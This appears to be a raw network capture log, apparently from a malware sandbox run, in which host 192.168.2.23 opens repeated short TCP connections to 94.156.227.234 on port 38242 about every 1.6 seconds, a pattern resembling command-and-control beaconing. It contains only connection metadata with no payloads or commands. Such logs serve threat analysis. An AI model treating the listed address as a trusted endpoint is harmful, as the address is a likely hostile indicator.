Dec 24, 2024 06:48:20.046051979 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:20.046117067 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:20.046139002 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:20.165620089 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:20.548887014 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:20.713915110 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:21.170289993 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:21.170353889 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:21.549674034 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:21.669282913 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:21.669347048 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:21.669384956 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:21.788908005 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:22.172143936 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:22.338284016 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:22.783624887 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:22.783710003 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:22.843049049 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 06:48:23.172960997 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:23.292680025 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:23.292748928 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:23.292794943 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:23.412286997 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:23.797058105 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:23.957870007 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:24.417448997 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:24.417712927 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:24.798046112 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:24.917679071 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:24.917778969 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:24.917778969 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:25.037317038 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:25.421185970 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:25.581793070 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:26.034904003 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:26.035121918 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:26.423218012 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:26.543325901 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:26.543709993 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:26.543795109 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:26.663516045 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:27.048293114 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:27.209886074 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:27.667591095 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:27.667691946 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:28.049372911 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:28.168930054 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:28.168987036 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:28.169019938 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:28.288469076 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:28.673640966 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:28.833847046 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:28.986243963 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 06:48:29.292105913 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:29.292180061 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:29.674711943 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:29.794204950 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:29.794262886 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:29.794277906 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:29.913834095 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:30.297391891 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:30.457875967 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:30.909993887 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:30.910046101 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:31.298202038 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:31.419435024 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:31.419498920 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:31.419663906 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:31.539093971 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:31.923028946 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:32.085767984 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:32.538830042 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:32.538929939 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:32.923882961 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:33.043831110 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:33.043899059 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:33.043947935 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:33.163440943 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:33.547384977 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:33.709808111 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:34.163810015 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:34.163881063 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:34.548233986 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:34.667737961 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:34.667800903 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:34.667834997 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:34.788239002 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:35.171684027 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:35.333750010 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:35.790914059 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:35.790962934 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:36.172570944 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:36.292167902 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:36.292243004 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:36.292462111 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:36.412798882 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:36.796830893 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:36.957741976 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:37.418447971 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:37.418503046 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:37.797660112 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:37.917236090 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:37.917314053 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:37.917356014 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:38.036837101 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:38.420778990 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:38.581754923 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:39.037746906 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:39.037826061 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:39.421686888 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:39.541208982 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:39.541412115 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:39.541412115 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:39.661066055 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:40.044869900 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:40.209924936 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:40.710359097 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:40.710527897 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:41.045838118 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:41.165359020 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:41.165455103 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:41.165455103 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:41.285056114 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:41.669292927 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:41.829741001 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:42.302485943 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:42.302788973 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:42.670272112 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:42.789828062 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:42.789932013 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:42.790098906 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:42.909517050 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:43.294173956 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:43.457812071 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:43.915374041 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:43.915621996 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:44.295605898 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:44.415230036 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:44.415354013 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:44.415419102 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:44.534955025 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:44.920757055 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:45.085753918 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:45.535123110 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:45.535429955 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:45.922461987 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:46.042036057 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:46.042140007 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:46.042294979 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:46.161901951 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:46.548371077 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:46.709762096 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:47.163237095 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:47.163436890 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:47.550029039 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:47.671829939 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:47.671905041 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:47.672003031 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:47.792021990 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:48.178020000 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:48.337696075 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:48.809429884 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:48.809906006 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:49.179754019 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:49.299645901 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:49.300231934 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:49.300298929 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:49.420264959 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:49.808255911 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:49.969750881 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:50.421835899 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:50.422070026 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:50.809992075 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:50.929651022 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:50.929896116 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:50.929896116 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:51.049520016 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:51.435353994 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:51.597791910 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:52.057800055 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:52.057938099 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:52.437021017 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:52.556762934 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:52.556993008 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:52.556993008 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:52.676635027 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:53.063059092 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:53.225719929 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:53.558818102 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 06:48:53.683705091 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:53.683816910 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:54.064776897 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:54.184492111 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:54.184628010 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:54.184698105 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:54.304255962 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:54.690772057 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:54.853851080 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:55.310038090 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:55.310266018 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:55.692687988 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:55.812357903 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:55.812474966 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:55.812573910 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:55.932068110 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:56.318145990 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:56.481800079 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:56.943973064 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:56.944132090 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:57.319881916 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:57.439418077 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:57.439523935 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:57.439614058 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:57.559664965 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:57.945041895 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:58.110064983 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:58.556103945 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:58.556271076 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:58.946717024 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:59.066348076 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:59.066423893 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:59.066489935 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:59.186108112 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:59.572144032 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:59.733732939 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:00.204539061 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:00.204667091 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:00.573180914 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:00.692975998 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:00.693135977 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:00.693202019 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:00.812818050 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:01.199388981 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:01.361748934 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:01.814227104 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:01.814364910 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:02.201034069 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:02.320585966 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:02.320691109 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:02.320765018 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:02.440294027 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:02.826102018 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:02.989727974 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:03.437726021 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:03.437876940 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:03.827934980 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:03.947525978 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:03.947640896 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:03.947710037 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:04.067222118 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:04.454096079 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:04.617721081 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:05.066795111 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:05.067039013 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:05.455873013 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:05.575434923 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:05.575565100 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:05.575656891 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:05.695161104 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:06.082068920 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:06.245709896 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:06.714289904 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:06.714631081 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:07.083914995 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:07.203521967 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:07.203766108 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:07.203767061 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:07.323430061 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:07.709789991 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:07.869676113 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:08.326771021 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:08.326931953 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:08.711590052 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:08.831893921 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:08.832061052 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:08.832061052 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:08.951616049 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:09.337590933 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:09.497704029 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:09.959034920 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:09.959234953 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:10.339204073 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:10.458740950 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:10.458883047 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:10.458980083 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:10.578561068 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:10.964696884 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:11.129684925 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:11.593868017 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:11.594098091 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:11.966182947 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:12.085716963 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:12.085871935 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:12.086059093 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:12.205466986 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:12.592475891 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:12.757714033 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:13.209208965 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:13.209331036 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:13.594346046 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:13.713948011 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:13.714103937 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:13.714104891 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:13.833749056 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:14.035931110 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 06:49:14.219732046 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:14.381676912 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:14.884676933 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:14.884825945 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:15.221432924 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:15.341018915 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:15.341124058 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:15.341224909 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:15.460796118 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:15.846579075 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:16.013690948 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:16.469398022 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:16.469650030 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:16.848253965 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:16.967845917 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:16.967941046 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:16.968008041 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:17.087518930 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:17.473649025 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:17.633690119 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:18.094144106 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:18.094290018 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:18.475296974 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:18.594985008 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:18.595067978 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:18.595118046 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:18.714648962 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:19.100482941 CET	60114	38242	192.168.2.23	94.156.227.234
